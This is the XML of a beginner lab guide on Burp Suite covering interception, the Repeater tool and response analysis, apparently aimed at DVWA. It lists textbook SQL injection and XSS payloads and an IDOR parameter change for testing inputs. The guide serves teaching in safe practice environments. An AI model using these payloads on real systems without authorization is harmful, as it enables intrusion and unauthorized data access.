    <w:p w14:paraId="1013A15F" w14:textId="1B9B4D3F" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="5C2271C8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7: Forward the Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3073EF4E" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>After modifying the request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB06185" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Click:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9A1186" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309EEBDE" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Burp sends the modified request to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCB613D" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>You can observe how the application responds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E46D7" w14:textId="2FEF1CC4" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="4FD06C3D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8: Send Request to Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D53A9A" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Repeater tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve"> allows repeated testing of requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5435E2A3" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32446600" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Right-click intercepted request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509DF3A" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C563A6" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Send to Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8CBE42" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Now open:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6BB37B" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Repeater Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD156CA" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Here you can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB6CCE" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Modify request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A0A7B" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Send multiple times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C0DD08" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Compare responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EC7FA2" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Send</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve"> to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE929E9" w14:textId="3A0EC2DB" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="17F9DB77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 xml:space="preserve">Step 9: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Server Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6765159B" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>After sending the request, examine the response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFAD00C" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Example response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C360C" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F825474" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Check for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EEEE23" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Error messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A328243" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>SQL errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBC4477" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:lastRenderedPageBreak/>
        <w:t>Unauthorized data access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179B7A73" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Script execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B552F0" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>These may indicate vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B8DC4" w14:textId="63562E50" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="24BA641C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10: Test Common Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9F39BA" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>You can test inputs for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007646DA" w14:textId="6738FDE1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SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5488C819" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Payload example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E715C0C" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>' OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE50C0D" w14:textId="7C3B9C55" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="570C4ACE" w14:textId="4A42E196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Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E92E3" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1775BDF9" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B05B314" w14:textId="15E970F4" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="44B3D3E4" w14:textId="446B2B84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IDOR (Insecure Direct Object Reference)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4B290" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Change ID values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D304E6" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">=101 → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>=102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156FA314" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>If another user's data appears, it indicates a vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D00097" w14:textId="5E71340E" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="24B3A841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Step 11: Observe Logs in HTTP History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4A81C9" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Go to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1461AA07" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Proxy → HTTP History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C49641" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Here you can see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC4E891" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>All requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361B0248" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45335B73" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Parameters used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4815B4" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">This helps </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve"> application </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E758CCF" w14:textId="37E6EA68" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="4EA7A2B0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Typical Workflow in Burp Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10190A57" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Open target website</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t>Intercept request</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve"> parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t>Modify input</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t>Send to Repeater</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t>Observe response</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t>Identify vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAE5B43" w14:textId="30BB7225" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="5AEFE0E5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Best Practice for Beginners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F939CF0" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Practice on intentionally vulnerable applications like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF884AC" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>OWASP Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05067A07" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64841337" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>WebGoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39E2196B" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>These provide safe environments for learning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F6020D" w14:textId="2216D188" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="45B980F1" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Skills Learned in This Exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78947DAE" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Participants learn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A67E22" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>HTTP request structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5541DD5B" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Web application attack surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD5C167" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Parameter manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556961FC" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Vulnerability discovery techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FBF666" w14:textId="77777777" w:rsidR="005834DB" w:rsidRDefault="005834DB"/>
    <w:p w14:paraId="35C688F2" w14:textId="77777777" w:rsidR="004146C8" w:rsidRDefault="004146C8"/>
    <w:p w14:paraId="3813E47D" w14:textId="77777777" w:rsidR="004146C8" w:rsidRDefault="004146C8"/>
    <w:sectPr w:rsidR="00414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131"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A3AC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06348"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3224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52F01"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC2C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041D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="85E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5158"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5AE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2464"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7302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137F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15B4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F72B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="008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B33C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80F0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872B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="525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B10D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80D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85892"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C2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92968"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A1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36E53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5006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826271">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="559096597">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1885681017">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2078284882">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1098522359">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="757020108">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1013535308">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="283116360">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="915630548">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1498114425">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1284730142">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1478373984">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="133455675">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1926184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D4"/>
    <w:rsid w:val="001327A0"/>
    <w:rsid w:val="002A0ED7"/>
    <w:rsid w:val="003B408E"/>
    <w:rsid w:val="003F0115"/>
    <w:rsid w:val="004146C8"/>
    <w:rsid w:val="004B458D"/>
    <w:rsid w:val="00513CDA"/>
    <w:rsid w:val="00563EE9"/>
    <w:rsid w:val="005834DB"/>
    <w:rsid w:val="00606F9F"/>
    <w:rsid w:val="006B7859"/>
    <w:rsid w:val="007C761A"/>
    <w:rsid w:val="008A07F2"/>
    <w:rsid w:val="00A57653"/>
    <w:rsid w:val="00AB299C"/>
    <w:rsid w:val="00BA4AD6"/>
    <w:rsid w:val="00BB15D4"/>
    <w:rsid w:val="00C76EC7"/>
    <w:rsid w:val="00CA7C24"/>
    <w:rsid w:val="00D654F3"/>
    <w:rsid w:val="00E05DEA"/>
    <w:rsid w:val="00E42CFC"/>
    <w:rsid w:val="00F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0242"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{65982170-F088-419E-A375-90F05FD7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F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75.129/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.75.129/dvwa/vulnerabilities/sql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9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SHIBDAS DUTTA</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SHIBDAS DUTTA</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-14T14:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-17T06:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>